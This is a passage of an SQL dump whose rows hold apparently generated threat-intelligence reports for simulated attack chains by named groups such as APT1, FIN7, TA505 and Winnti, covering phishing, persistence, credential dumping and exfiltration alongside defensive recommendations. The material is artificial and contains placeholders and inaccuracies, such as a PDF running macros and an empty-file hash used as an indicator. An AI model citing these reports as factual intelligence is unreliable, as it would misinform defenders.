(536, 106, 1064, 3, 'Persistence Mechanism Investigation', '### Identification of Persistence Mechanisms\n\nThe detection of persistence mechanisms is a crucial phase, ensuring the spyware remains active on the device. Typical methods include modifying system files or leveraging legitimate services.\n\n#### Observed Techniques:\n- Installation of malicious profiles or certificates.\n- Alteration of system settings to ensure continuous access.\n\n#### Actionable Intelligence:\n- Conduct a comprehensive audit of system settings and installed profiles.\n- Prepare for potential data exfiltration activities by monitoring network traffic anomalies.', '2026-01-24 03:33:29'),
(537, 106, 1065, 4, NULL, NULL, '2026-01-24 03:33:29'),
(538, 107, 1066, 1, 'Analysis of Initial Access Vector', '### Overview\nAfter the detection of the suspicious email phishing campaign, further analysis reveals that the phishing emails deployed by **APT1** have been crafted using social engineering techniques targeting employees in sensitive roles across various sectors.\n\n### Tactics\n- **Spear Phishing**: Emails are personalized, appearing to originate from trusted sources within the victim\'s organization.\n- **Payloads**: Emails contain links to malicious sites or attachments designed to exploit vulnerabilities.\n\n### Recommendations\n- Enhance email filtering and monitoring systems.\n- Conduct employee awareness training on identifying phishing attempts.\n\n### Next Steps\nPrepare for potential **Remote Code Execution** as APT1 is known to leverage malicious attachments, such as PDFs, to gain execution within target networks.', '2026-01-24 03:35:49'),
(539, 107, 1067, 2, 'Malicious PDF Attack Vector Analysis', '### Overview\nFollowing the remote code execution via malicious PDFs, analysis indicates that **APT1** employs sophisticated PDF exploits targeting vulnerabilities in outdated PDF readers.\n\n### Tactics\n- **Exploitation**: PDFs are designed to exploit specific vulnerabilities (e.g., CVE-XXXX-XXXX).\n- **Payload Delivery**: Upon execution, the payload establishes initial foothold and downloads additional malware.\n\n### Recommendations\n- Ensure all PDF reader software is updated to the latest versions.\n- Implement strict file type restrictions and scanning protocols on email attachments.\n\n### Next Steps\nMonitor for **Persistence** mechanisms, as APT1 often alters system registries to maintain access.', '2026-01-24 03:35:49'),
(540, 107, 1068, 3, 'Persistence Mechanisms in APT1 Operations', '### Overview\nPersistence has been achieved through registry modification, a common tactic used by **APT1** to maintain long-term access to compromised systems.\n\n### Tactics\n- **Registry Changes**: Modifications are made to ensure malware execution upon system startup.\n- **Stealth Techniques**: Changes are often subtle and blended with legitimate entries to avoid detection.\n\n### Recommendations\n- Regularly audit and compare registry entries against known baselines.\n- Deploy tools that can detect unauthorized registry modifications.\n\n### Next Steps\nFocus on detecting **Credential Dumping** activities, as APT1 looks to escalate privileges and move laterally within the network.', '2026-01-24 03:35:49'),
(541, 107, 1069, 4, 'Credential Dumping and Lateral Movement Analysis', '### Overview\nCredential dumping detected within the network, indicates **APT1**\'s attempt to escalate privileges and move laterally.\n\n### Tactics\n- **Tools Utilized**: Common tools include Mimikatz and custom scripts designed to extract credentials from memory.\n- **Targeted Accounts**: Focus on accounts with administrative privileges.\n\n### Recommendations\n- Implement multi-factor authentication for all sensitive accounts.\n- Regularly rotate and monitor privileged account credentials.\n\n### Next Steps\nPrepare for potential **Data Exfiltration**, as APT1 typically uses encrypted channels to exfiltrate data from compromised networks.', '2026-01-24 03:35:49'),
(542, 107, 1070, 5, NULL, NULL, '2026-01-24 03:35:49'),
(543, 108, 1071, 1, 'Analysis of Unusual Network Traffic', '### Overview\nFollowing the detection of unusual network traffic, a detailed packet analysis was conducted. The traffic was traced back to a compromised endpoint within the corporate network.\n\n### Key Findings\n- **Source IP:** 192.168.1.105\n- **Destination IP:** External IP linked to a known Command and Control (C2) server.\n- **Traffic Pattern:** High-frequency connections at irregular intervals suggest automated data exfiltration attempts.\n\n### Next Steps\n- Enhanced endpoint monitoring is recommended to detect any suspicious file executions that could indicate the execution stage of the malware lifecycle.', '2026-01-24 03:35:57'),
(544, 108, 1072, 2, 'Investigation of Suspicious File Execution', '### Overview\nSuspicious file execution was identified on the compromised endpoint, correlating with the initial network traffic alert.\n\n### Key Findings\n- **Executed File:** `malware_loader.exe`\n- **Execution Path:** C:\\Users\\Public\\Downloads\n- **Behavior:** The file attempts to reach out to multiple C2 servers, suggesting an attempt to download additional payloads.\n\n### Next Steps\n- Conduct a forensic analysis to determine any changes in the file system, which may indicate persistence mechanisms being deployed.', '2026-01-24 03:35:57'),
(545, 108, 1073, 3, 'Detection of Encrypted File System', '### Overview\nThe investigation revealed that the malware has encrypted certain files on the affected endpoint, an indication of persistence.\n\n### Key Findings\n- **Encryption Method:** AES-256\n- **Affected Files:** System configuration files and user data\n- **Persistence Mechanism:** Registry keys modified to execute malware at startup\n\n### Next Steps\n- Initiate containment procedures and prepare to intercept any attempts of lateral movement to other network segments.', '2026-01-24 03:35:57'),
(546, 108, 1074, 4, 'Lateral Movement Attempt Analysis', '### Overview\nAn attempt to move laterally within the network was observed, leveraging compromised credentials.\n\n### Key Findings\n- **Compromised Account:** `admin_user@example.com`\n- **Movement Path:** Targeted access to file servers and sensitive databases\n- **Technique Used:** Pass-the-Hash attack\n\n### Next Steps\n- Monitor for data exfiltration activities and secure sensitive data stores to prevent unauthorized access.', '2026-01-24 03:35:57'),
(547, 108, 1075, 5, NULL, NULL, '2026-01-24 03:35:57'),
(548, 109, 1076, 1, 'Deep Dive into the Phishing Attempt', '### Context on Phishing Attempt\n\nAfter the initial alert regarding a suspicious email, further analysis reveals that the email originated from a compromised server located in Eastern Europe. The email contained a malicious attachment disguised as a PDF file titled \'Quarterly ICS Update.\'\n\n### Key Indicators\n- **Sender Domain**: [compromisedvendor.org]\n- **Attachment Hash**: `d41d8cd98f00b204e9800998ecf8427e`\n- **Subject Line**: `Urgent: Review Required`\n\n### Recommendations\n- Implement advanced email filtering rules.\n- Conduct awareness training focusing on identifying phishing attempts.\n\n### Next Steps\nPrepare for potential execution of malware as the initial access vector has been planted.', '2026-01-24 03:36:35'),
(549, 109, 1077, 2, 'Reconnaissance Malware Analysis', '### Execution and Reconnaissance Insights\n\nFollowing the execution alert, it is confirmed that a reconnaissance malware has been executed on the target system. This malware, identified as a variant of the \'Duqu 2.0\' strain, is known for its stealth and modular architecture.\n\n### Technical Details\n- **Malware Type**: Reconnaissance\n- **File Name**: `sysmon.exe`\n- **Command and Control (C2) Server**: `185.92.220.48`\n\n### Objectives\nThe primary goal is to map the organization\'s ICS network and identify critical assets.\n\n### Mitigation Strategies\n- Monitor network traffic for connections to known C2 servers.\n- Isolate infected systems and perform a thorough forensic analysis.\n\n### Next Steps\nBe vigilant for persistence mechanisms that may be installed following reconnaissance.', '2026-01-24 03:36:35'),
(550, 109, 1078, 3, 'Persistence Mechanisms Identified', '### Persistence via Backdoor Installation\n\nPost-reconnaissance, it has been established that a sophisticated backdoor, likely derived from the Equation Group\'s \'Double Fantasy\' malware, has been installed to maintain persistent access.\n\n### Features of the Backdoor\n- **Installation Method**: Leveraged privilege escalation vulnerabilities in ICS software.\n- **Backdoor Name**: `doublefantasy.dll`\n- **Communication**: Utilizes HTTPS for encrypted communications with C2.\n\n### Recommendations\n- Apply patches to all vulnerable ICS software.\n- Enhance monitoring for unusual outbound HTTPS traffic.\n\n### Next Steps\nPrepare for potential lateral movement attempts exploiting ICS protocols.', '2026-01-24 03:36:35'),
(551, 109, 1079, 4, 'Lateral Movement Detected', '### Exploitation of ICS Protocols\n\nFollowing the persistence phase, the adversary has initiated lateral movement within the ICS network. They are exploiting specific ICS protocols to move undetected between systems.\n\n### Details of Exploitation\n- **Exploited Protocols**: OPC UA, Modbus\n- **Affected Systems**: SCADA controllers and PLCs\n- **Lateral Movement Technique**: Credential dumping and pass-the-hash\n\n### Defensive Measures\n- Segregate ICS from corporate networks using firewalls.\n- Regularly update and patch ICS components.\n\n### Next Steps\nFocus on identifying and mitigating data exfiltration attempts.', '2026-01-24 03:36:35'),
(552, 109, 1080, 5, NULL, NULL, '2026-01-24 03:36:35');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(553, 110, 1081, 1, 'Analysis of Spear-Phishing Techniques', '### Overview\nThe initial access vector utilized by The Mask\'s Careto campaign is spear-phishing emails. These emails contain malicious attachments designed to look like legitimate documents.\n\n### Key Findings\n- **Targeted Individuals**: High-ranking government officials.\n- **Email Characteristics**: Often mimics internal government communications, increasing the likelihood of the target opening the attachment.\n- **Attachment Type**: Commonly uses office document formats with embedded macros.\n\n### Next Steps\nInvestigate the execution of malicious scripts triggered by these attachments to understand the malware\'s behavior post-initial access.', '2026-01-24 03:40:42'),
(554, 110, 1082, 2, 'Malicious Script Execution Tactics', '### Overview\nOnce the malicious attachment is opened, it executes scripts that deploy the Careto malware onto the victim\'s system.\n\n### Key Findings\n- **Script Languages**: Primarily uses PowerShell and VBScript to maintain compatibility across systems.\n- **Obfuscation Techniques**: The scripts are heavily obfuscated to avoid detection by traditional antivirus solutions.\n\n### Next Steps\nFocus on understanding how these scripts establish persistence mechanisms to maintain long-term access to compromised systems.', '2026-01-24 03:40:42'),
(555, 110, 1083, 3, 'Persistence Mechanisms of Careto Malware', '### Overview\nThe Careto malware employs sophisticated persistence mechanisms to ensure it remains active on infected systems.\n\n### Key Findings\n- **Techniques Used**: Modifications to the Windows Registry and creation of scheduled tasks.\n- **Survivability**: Designed to survive system reboots and updates.\n\n### Next Steps\nInvestigate how Careto conducts credential dumping to facilitate lateral movement within the targeted network.', '2026-01-24 03:40:42'),
(556, 110, 1084, 4, 'Credential Dumping and Lateral Movement', '### Overview\nAfter establishing persistence, Careto focuses on credential dumping to move laterally within the network.\n\n### Key Findings\n- **Tools Employed**: Utilizes open-source tools like Mimikatz for credential extraction.\n- **Lateral Movement**: Exploits valid accounts to access additional network resources.\n\n### Next Steps\nExamine the methods used for data exfiltration, particularly how Careto uses encrypted channels to avoid detection.', '2026-01-24 03:40:42'),
(557, 110, 1085, 5, NULL, NULL, '2026-01-24 03:40:42'),
(558, 111, 1086, 1, 'Analysis of Phishing Techniques in Operation Machete', '## Overview\nThe initial stage of Operation Machete involves a sophisticated phishing campaign. The attackers utilize spear-phishing emails, targeting military and government officials in Venezuela, Ecuador, and Colombia.\n\n## Phishing Email Characteristics\n- **Subject Lines**: Mimic official government communications\n- **Attachments**: Include malicious documents disguised as official reports\n\n## Next Steps\nThe successful execution of these phishing techniques leads to the deployment of a Python-based Remote Access Trojan (RAT) on compromised systems.', '2026-01-24 03:41:05'),
(559, 111, 1087, 2, 'Unveiling the Python-Based RAT in Operation Machete', '## Overview\nFollowing successful phishing attempts, the attackers deploy a Python-based Remote Access Trojan (RAT) to infiltrate target systems.\n\n## RAT Capabilities\n- **Remote Command Execution**: Allows attackers to execute commands on the compromised host\n- **Data Collection**: Gathers system information and user activity\n\n## Implications\nThe execution of this RAT sets the stage for establishing persistence mechanisms, ensuring continued access to the compromised systems.', '2026-01-24 03:41:05'),
(560, 111, 1088, 3, 'Persistence Mechanisms: Scheduled Tasks in Operation Machete', '## Overview\nTo maintain long-term access to compromised systems, Operation Machete employs persistence mechanisms such as scheduled tasks.\n\n## Persistence Techniques\n- **Scheduled Tasks**: Automatically execute the RAT at specific intervals\n- **Startup Modifications**: Ensures RAT runs upon system boot\n\n## Next Phase\nWith persistence established, attackers focus on credential harvesting and lateral movement within the network.', '2026-01-24 03:41:05'),
(561, 111, 1089, 4, 'Credential Harvesting and Lateral Movement in Operation Machete', '## Overview\nOperation Machete progresses to credential harvesting and lateral movement, expanding their foothold within the target networks.\n\n## Techniques Used\n- **Credential Dumping**: Extracts passwords and hashes from compromised systems\n- **Lateral Movement**: Exploits harvested credentials to access additional systems\n\n## Strategic Goal\nThese actions set the stage for the final phase: data exfiltration via encrypted channels, allowing attackers to extract valuable intelligence.', '2026-01-24 03:41:05'),
(562, 111, 1090, 5, NULL, NULL, '2026-01-24 03:41:05'),
(563, 112, 1091, 1, 'Investigation into Suspicious Email Attachment', '# Investigation into Suspicious Email Attachment\n\n## Overview\nFollowing the detection of a suspicious email attachment potentially associated with a phishing attempt, an in-depth analysis was conducted on the email and its attachment.\n\n## Key Findings\n- **Sender Analysis**: The email originated from a domain closely resembling a known financial services partner, indicating potential domain spoofing.\n- **Attachment Details**: The attached file was a Microsoft Word document containing malicious macros designed to execute scripts upon opening.\n- **Target**: The email was sent to multiple employees within the finance department, suggesting a targeted spear-phishing campaign.\n\n## Recommendations\n- Immediate removal of the email from all recipient inboxes.\n- Conduct an organization-wide phishing awareness training.\n- Implement advanced email filtering to detect similar threats in the future.\n\n## Next Steps\nMonitor for any **Unauthorized PowerShell Execution**, which could indicate further compromise following this phishing attempt.', '2026-01-25 20:00:09'),
(564, 112, 1092, 2, 'Unauthorized PowerShell Execution Detected', '# Unauthorized PowerShell Execution Detected\n\n## Overview\nFollowing the suspicious email attachment, unauthorized PowerShell activity was detected, indicating a potential command and control attempt by the Poseidon Group.\n\n## Key Findings\n- **Execution Context**: The PowerShell script was executed under a user account belonging to the finance department, consistent with the targets of the prior phishing attempt.\n- **Commands Executed**: The script attempted to connect to a remote server using encoded commands, likely for data exfiltration or further payload deployment.\n- **Indicators of Compromise (IOCs)**: Unusual network connections to IP addresses associated with known threat actors.\n\n## Recommendations\n- Immediate isolation of the affected systems from the network.\n- Conduct a full forensic analysis to trace the extent of the compromise.\n- Update firewall rules to block known malicious IPs.\n\n## Next Steps\nPrepare for potential **Data Exfiltration Attempt through Unusual Network Traffic**, as this is a common follow-up tactic in extortion-driven attacks.', '2026-01-25 20:00:09'),
(565, 112, 1093, 3, NULL, NULL, '2026-01-25 20:00:09'),
(566, 113, 1094, 1, 'Analysis of Network Traffic Patterns', '## Context on Suspicious Network Traffic\n\nFollowing the detection of suspicious network traffic, further analysis reveals a pattern consistent with initial access attempts by FIN7. The traffic originates from IP addresses known to be used by the group. The data packets show signs of reconnaissance activities, suggesting an attempt to identify vulnerable systems within the network.\n\n### Next Steps:\n- Monitor for unauthorized tool execution.\n- Implement enhanced network monitoring to capture any further anomalies.', '2026-01-28 00:05:11'),
(567, 113, 1095, 2, 'Identification of Unauthorized Tool Execution', '## Unauthorized Penetration Testing Tools Detected\n\nPost detection of unauthorized execution, our investigation confirms the use of legitimate penetration testing tools. These tools, often used by adversaries to blend in with legitimate security operations, indicate a strategic move towards executing payloads that could potentially interact with point-of-sale systems.\n\n### Insights:\n- Tools identified include Cobalt Strike and Metasploit.\n- Review of endpoint protection logs is critical to prevent persistence mechanisms from being established.', '2026-01-28 00:05:11'),
(568, 113, 1096, 3, 'Discovery of Persistence Mechanisms', '## Newly Created Scheduled Tasks Indicate Persistence\n\nSubsequent to the unauthorized execution alert, our systems have detected new scheduled tasks created on several endpoints. These tasks are configured to run payloads at specific intervals, ensuring continued access and operation within the compromised environment.\n\n### Recommendations:\n- Immediate review and removal of suspicious scheduled tasks.\n- Strengthen auditing of task creation and modification activities.', '2026-01-28 00:05:11'),
(569, 113, 1097, 4, 'Tracing Lateral Movement Activities', '## Lateral Movement via SMB Protocol\n\nUpon identifying scheduled tasks, analysis has revealed lateral movement through the SMB protocol. FIN7 appears to be exploiting SMB vulnerabilities to traverse the network, targeting other systems potentially housing sensitive data.\n\n### Action Items:\n- Restrict SMB traffic to essential systems only.\n- Conduct a thorough review of access logs to identify compromised credentials used in lateral movement.', '2026-01-28 00:05:11'),
(570, 113, 1098, 5, NULL, NULL, '2026-01-28 00:05:11'),
(571, 114, 1099, 1, 'Phishing Tactics and Techniques', '# Phishing Tactics and Techniques\n\n## Overview\nThe initial access vector utilized by the Silence Group involves a sophisticated phishing campaign. This campaign is characterized by:\n\n- **Targeted Emails:** Customized emails sent to bank employees with seemingly legitimate requests.\n- **Malicious Attachments:** Use of document files with embedded macros to deploy the initial payload.\n\n## Recommendations\n- **User Training:** Conduct awareness sessions to educate employees on phishing threats.\n- **Email Filtering:** Implement advanced email filtering systems to detect and block suspicious emails.', '2026-01-28 00:08:15'),
(572, 114, 1100, 2, 'Analysis of Suspicious PowerShell Activity', '# Analysis of Suspicious PowerShell Activity\n\n## Overview\nFollowing the initial phishing attack, suspicious PowerShell activity was detected. This activity is likely used for:\n\n- **Payload Execution:** Running scripts to download additional malware components.\n- **System Reconnaissance:** Gathering information about the infected system to plan further attacks.\n\n## Indicators\n- **Command Line Patterns:** Look for unusual encoded commands or remote script executions.\n- **Network Connections:** Monitor outbound connections initiated by PowerShell processes.\n\n## Recommendations\n- **Script Blocking:** Disable unnecessary PowerShell script execution on user machines.\n- **Logging:** Enable detailed logging for PowerShell activities.', '2026-01-28 00:08:15'),
(573, 114, 1101, 3, 'Scheduled Task Anomalies', '# Scheduled Task Anomalies\n\n## Overview\nThe Silence Group is employing unusual scheduled tasks as a persistence mechanism to maintain access on compromised systems.\n\n## Details\n- **Task Names:** Typically obscure or mimicking legitimate system tasks.\n- **Execution Frequency:** Regular intervals to ensure malware remains active.\n\n## Recommendations\n- **Audit Scheduled Tasks:** Regularly review and audit scheduled tasks on critical systems.\n- **Alert on Anomalies:** Set up alerts for the creation of new tasks that do not adhere to established naming conventions or execution patterns.', '2026-01-28 00:08:15'),
(574, 114, 1102, 4, 'Lateral Movement and Internal Server Compromise', '# Lateral Movement and Internal Server Compromise\n\n## Overview\nUnauthorized access to internal servers has been detected, indicating a successful lateral movement by the Silence Group through:\n\n- **Stolen Credentials:** Use of credentials obtained via previous phishing and reconnaissance efforts.\n- **Remote Desktop Protocol (RDP):** Exploiting RDP to spread malware to other network segments.\n\n## Indicators\n- **Login Anomalies:** Unusual login times and locations.\n- **RDP Access Patterns:** Increased or unexpected RDP sessions.\n\n## Recommendations\n- **Two-Factor Authentication:** Implement 2FA for all critical systems and remote access.\n- **Network Segmentation:** Isolate critical systems to limit lateral movement potential.', '2026-01-28 00:08:15'),
(575, 114, 1103, 5, NULL, NULL, '2026-01-28 00:08:15'),
(576, 115, 1104, 1, 'Assessment of Initial Access via Phishing', '### Contextual Overview\nFollowing the detection of a suspicious phishing email, analysis reveals that APT35 is employing advanced social engineering tactics to compromise targets within the aerospace and telecom sectors. The email contained a malicious link masquerading as an HR document, aiming to lure victims into credential theft.\n\n### Key Findings\n- **Phishing Techniques**: Utilized spear-phishing emails that exploit current events to increase legitimacy.\n- **Target Profile**: Primarily middle to high-level management positions, with access to sensitive data.\n\n### Recommendations\n- Immediate implementation of enhanced email filtering rules.\n- Conduct employee training sessions on recognizing phishing attempts.', '2026-01-28 00:08:43'),
(577, 115, 1105, 2, 'Magic Hound Malware Execution Analysis', '### Malware Behavior\nUpon execution, the Magic Hound malware demonstrated capabilities of extensive reconnaissance within the victim\'s network. It uses sophisticated methods to evade detection by traditional antivirus solutions.\n\n### Technical Insights\n- **Execution Pathway**: Delivered via a malicious link leading to a payload download.\n- **Evasion Tactics**: Employs obfuscation techniques to avoid detection.\n\n### Recommendations\n- Deploy advanced endpoint detection and response (EDR) solutions.\n- Conduct a network-wide scan for similar indicators of compromise (IoCs).', '2026-01-28 00:08:43'),
(578, 115, 1106, 3, 'Persistence Strategy Using Cloud Services', '### Persistence Mechanisms\nAPT35 has leveraged legitimate cloud services to maintain persistence within compromised networks. This approach allows threat actors to blend their activities with normal network traffic.\n\n### Observations\n- **Cloud Usage**: Utilizes cloud storage to host command-and-control (C2) infrastructure.\n- **Stealth Techniques**: Employs encrypted communications to obfuscate data transfers.\n\n### Recommendations\n- Audit cloud service configurations for unusual activities.\n- Establish regular reviews of access logs to detect anomalies.', '2026-01-28 00:08:43'),
(579, 115, 1107, 4, 'Lateral Movement and Data Exfiltration Tactics', '### Threat Analysis\nAPT35 has been observed using proprietary tools to facilitate lateral movement within networks, ultimately aiming to exfiltrate sensitive data.\n\n### Key Insights\n- **Movement Techniques**: Utilizes stolen credentials to move laterally across the network.\n- **Data Theft**: Exfiltrated data is compressed and encrypted before being sent to external servers.\n\n### Recommendations\n- Implement network segmentation to limit lateral movement.\n- Strengthen monitoring of outbound traffic for signs of data exfiltration.', '2026-01-28 00:08:43'),
(580, 115, 1108, 5, NULL, NULL, '2026-01-28 00:08:43'),
(581, 116, 1109, 1, 'Analysis of Phishing Email Tactics', '### Overview\nAfter the initial access was gained via a phishing email, our analysis focused on the tactics used in the phishing campaign.\n\n### Email Characteristics\n- **Sender Domain:** The email originated from a spoofed domain designed to mimic a legitimate Middle Eastern organization.\n- **Subject Line:** The subject line was crafted to elicit urgency, likely referencing recent regional developments.\n- **Attachments:** The email included a malicious PDF attachment, which, when opened, executed macros to download the initial stage of the Total Commander RAT.\n\n### Recommendations\n- **User Awareness Training:** Enhance phishing awareness training for employees, emphasizing recognition of spoofed domains and suspicious attachments.\n- **Email Filtering:** Implement advanced email filtering solutions to detect and quarantine potential phishing emails.', '2026-02-01 13:57:07'),
(582, 116, 1110, 2, 'Total Commander RAT Execution Analysis', '### Overview\nFollowing the execution of the Total Commander RAT, we conducted a forensic analysis to understand its operation within the compromised systems.\n\n### Execution Details\n- **Initial Payload:** The RAT was executed via a malicious macro embedded in the PDF from the phishing email.\n- **Execution Path:** The initial payload created a scheduled task to ensure the RAT\'s persistence.\n\n### Capabilities\n- **Remote Access:** The RAT allows attackers to remotely control the compromised system.\n- **Credential Harvesting:** It includes modules for capturing user credentials.\n\n### Recommendations\n- **Endpoint Protection:** Deploy robust endpoint detection and response solutions to identify and mitigate RAT activity.\n- **Macro Restrictions:** Consider disabling macros by default in office documents.', '2026-02-01 13:57:07'),
(583, 116, 1111, 3, 'Persistence Mechanisms via Scheduled Tasks', '### Overview\nPost malware execution, the attackers established persistence through scheduled tasks, allowing the Total Commander RAT to survive reboots.\n\n### Persistence Details\n- **Scheduled Tasks Creation:** The RAT created a scheduled task named \"Updater\" with hidden attributes, set to execute the RAT binary at startup.\n- **Registry Modifications:** Registry keys were modified to maintain a low footprint on the system.\n\n### Recommendations\n- **Task Monitoring:** Implement continuous monitoring and logging of scheduled tasks to detect unauthorized modifications.\n- **Registry Auditing:** Enable auditing of critical registry hives to detect unauthorized changes.', '2026-02-01 13:57:07'),
(584, 116, 1112, 4, 'Credential Access and Lateral Movement', '### Overview\nAfter persistence was established, attackers utilized stolen credentials to move laterally across the network.\n\n### Credential Acquisition\n- **Techniques Used:** The attackers leveraged the credential harvesting capabilities of the RAT to capture usernames and passwords.\n- **Credential Dumping Tools:** Tools such as Mimikatz were observed in use for credential dumping.\n\n### Lateral Movement\n- **Target Systems:** The attackers primarily targeted systems with administrative privileges and access to sensitive data.\n\n### Recommendations\n- **Credential Hygiene:** Enforce strong password policies and encourage regular password updates.\n- **Network Segmentation:** Limit access between network segments to reduce the impact of credential theft.', '2026-02-01 13:57:07'),
(585, 116, 1113, 5, NULL, NULL, '2026-02-01 13:57:07'),
(586, 117, 1114, 1, 'Analysis of Phishing Email Tactics', '### Overview\nThe phishing email detected, posing as a conference invitation, serves as an initial vector for APT35 to engage targets by exploiting their academic interests.\n\n### Key Findings\n- **Sender Analysis**: The email was sent from a domain closely resembling a legitimate academic conference, utilizing typosquatting techniques.\n- **Content Details**: The email content included legitimate conference themes and speaker lists, with minor errors indicating automated generation.\n\n### Recommendations\n- **Awareness Training**: Educate potential targets on recognizing such phishing attempts through workshops.\n- **Email Filtering**: Enhance email filtering rules to detect and quarantine similar phishing emails.', '2026-02-01 13:57:21'),
(587, 117, 1115, 2, 'Credential Harvesting Page Breakdown', '### Overview\nThe malicious link embedded in the phishing email redirects to a credential harvesting page designed to mimic legitimate conference registration sites.\n\n### Key Findings\n- **Page Design**: The page closely replicates the aesthetic and functionality of typical conference registration platforms, including fields for personal and institutional credentials.\n- **Technical Analysis**: Examination of the page\'s source code reveals the use of JavaScript to capture and exfiltrate input data to a remote server.\n\n### Recommendations\n- **Network Monitoring**: Implement monitoring for outbound connections to known malicious IPs and domains associated with APT35.\n- **Two-Factor Authentication**: Encourage the use of two-factor authentication for accessing sensitive academic resources.', '2026-02-01 13:57:21'),
(588, 117, 1116, 3, 'Credential Use and Persistence Efforts', '### Overview\nPost-credential harvesting, APT35 attempts to leverage stolen credentials to gain persistent access to targeted systems.\n\n### Key Findings\n- **Credential Use Patterns**: Analysis shows attempts to access email accounts and academic databases using harvested credentials.\n- **Persistence Techniques**: The adversaries employ automated scripts to repeatedly log in and maintain access, potentially setting up forwarding rules in compromised email accounts.\n\n### Recommendations\n- **Account Lockout Policies**: Implement stricter account lockout policies after multiple failed login attempts.\n- **Incident Response**: Conduct thorough incident response and forensic analysis to identify compromised accounts and mitigate further risks.', '2026-02-01 13:57:21'),
(589, 117, 1117, 4, NULL, NULL, '2026-02-01 13:57:21'),
(590, 118, 1118, 1, 'Initial Access: Software Installation Insights', '## Initial Access Analysis\n\n**Context:** The first alert in the operation was triggered by the detection of suspicious software installations on multiple endpoints within Russian financial institutions.\n\n**Findings:**\n- The software in question was identified to have been delivered via phishing emails containing malicious attachments.\n- The malware is confirmed to be a variant of the RTM Group\'s banking trojan, often disguised as legitimate financial software.\n- Indicators of compromise (IOCs) include unusual file hashes and registry changes linked to the trojan.\n\n**Next Steps:**\n- Monitor for any unusual script executions on affected workstations, which may signal further execution of the trojan.', '2026-02-01 13:57:41'),
(591, 118, 1119, 2, 'Execution Phase: Script Activity Analysis', '## Execution Analysis\n\n**Context:** Following the initial suspicious software installation, unusual script executions were detected on several workstations.\n\n**Findings:**\n- Scripts were executed using PowerShell, likely to establish communication with command-and-control (C2) servers.\n- The scripts were obfuscated, indicating a high level of sophistication typical of RTM Group operations.\n- Network traffic analysis shows connections to known malicious IP addresses linked with RTM Group.\n\n**Deeper Insight:**\n- These scripts are part of the trojan\'s payload delivery mechanism, aiming to download additional malicious modules.\n\n**Next Steps:**\n- Investigate persistent network anomalies that may indicate the establishment of a more permanent foothold in the network.', '2026-02-01 13:57:41'),
(592, 118, 1120, 3, NULL, NULL, '2026-02-01 13:57:41'),
(593, 119, 1121, 1, 'Macro Execution Analysis', '# Macro Execution Analysis\n\nFollowing the detection of the phishing email, the next stage in TA505\'s attack chain involves the execution of malicious macros embedded within a document. These macros are designed to extract and execute a payload that facilitates further compromise of the system.\n\n## Key Findings:\n- **Document Type**: The document was identified as a Microsoft Word file with embedded macros.\n- **Payload Delivery**: Once the document is opened, the macro downloads a secondary payload from a remote server.\n- **Obfuscation Techniques**: The macro code is heavily obfuscated to evade detection from signature-based defenses.\n\n## Recommendations:\n- Implement strict email filtering and attachment scanning policies.\n- Educate users on recognizing suspicious documents and avoiding macro-enabled files.', '2026-02-01 13:58:57'),
(594, 119, 1122, 2, 'Establishing Backdoor - TA505 Persistence', '# Establishing Backdoor - TA505 Persistence\n\nAfter the macro execution, TA505 aims to establish persistence within the network. This involves setting up a backdoor that allows continuous access.\n\n## Key Indicators:\n- **Registry Modifications**: Changes were detected in the Windows Registry to ensure the backdoor starts with the system.\n- **Scheduled Tasks**: New tasks were scheduled to run malicious scripts at regular intervals.\n- **Network Traffic**: Outbound connections to known TA505 command and control (C2) servers were observed.\n\n## Mitigation Strategies:\n- Regularly audit registry and scheduled tasks for unauthorized changes.\n- Monitor network traffic for anomalies and block known malicious IPs.', '2026-02-01 13:58:57'),
(595, 119, 1123, 3, 'Credential Dumping Investigated', '# Credential Dumping Investigated\n\nWith persistence ensured, TA505\'s next step involves credential dumping to facilitate lateral movement across the network.\n\n## Tools and Techniques:\n- **Mimikatz Usage**: Evidence of Mimikatz being used to extract credentials from memory.\n- **SAM and SYSTEM File Access**: Unauthorized access to SAM and SYSTEM files was detected.\n\n## Defensive Measures:\n- Employ endpoint detection and response (EDR) solutions to identify and alert on credential dumping activities.\n- Implement least privilege access and ensure sensitive accounts use multi-factor authentication.', '2026-02-01 13:58:57'),
(596, 119, 1124, 4, 'Data Exfiltration via Clop Ransomware', '# Data Exfiltration via Clop Ransomware\n\nThe final stage is the exfiltration of sensitive data followed by deployment of Clop ransomware, marking the culmination of TA505\'s operation; the data is transferred out before encryption begins, so the exfiltration traffic is the last opportunity to detect the intrusion before impact.\n\n## Exfiltration Pathways:\n- **Encrypted Archives**: Data was compressed and encrypted before transfer to avoid detection.\n- **Outbound Channels**: Data exfiltration occurred via HTTP POST requests to remote servers controlled by TA505.\n\n## Prevention Steps:\n- Use data loss prevention (DLP) solutions to detect and block unauthorized data transfers.\n- Regularly backup critical data and maintain offline copies to mitigate ransomware effects.', '2026-02-01 13:58:57'),
(597, 119, 1125, 5, NULL, NULL, '2026-02-01 13:58:57'),
(598, 120, 1126, 1, 'Suspicious Network Activity Analysis', '### Overview\nFollowing the alert for suspicious network activity, analysis indicates potential initial access by the Winnti Group. Network logs reveal unusual traffic patterns consistent with known tactics used by this group.\n\n### Key Observations\n- **IP Anomalies:** Connections from IP ranges associated with previous Winnti campaigns.\n- **Protocol Misuse:** Abnormal use of HTTP/HTTPS protocols to access internal resources.\n- **Unrecognized User Agents:** User agents not corresponding to any known legitimate applications.\n\n### Recommendations\n- Implement stricter firewall rules to prevent unauthorized access.\n- Conduct a thorough review of access logs for compromised credentials.\n- Enhance monitoring of entry points to detect further anomalies.', '2026-02-01 14:01:29'),
(599, 120, 1127, 2, 'Malicious Code Execution Investigation', '### Overview\nAfter detecting malicious code execution, further investigation confirms the presence of a dropper used by the Winnti Group. This dropper is responsible for deploying additional payloads into the system.\n\n### Key Findings\n- **Execution Path:** The dropper was signed with a code-signing certificate stolen from a trusted vendor, allowing it to pass signature-based trust checks.\n- **Payload Analysis:** The dropper has been identified as a variant of a known Winnti malware family.\n- **Execution Context:** The malicious code was executed under user contexts with elevated privileges, allowing deeper system penetration.\n\n### Recommendations\n- Notify the vendor and its certificate authority so the compromised code-signing certificate is revoked; until revocation propagates, block the certificate thumbprint through local trust policy.\n- Deploy endpoint detection and response (EDR) tools to identify further malicious activities.\n- Conduct a forensic analysis of affected systems to assess the extent of the breach.', '2026-02-01 14:01:30'),
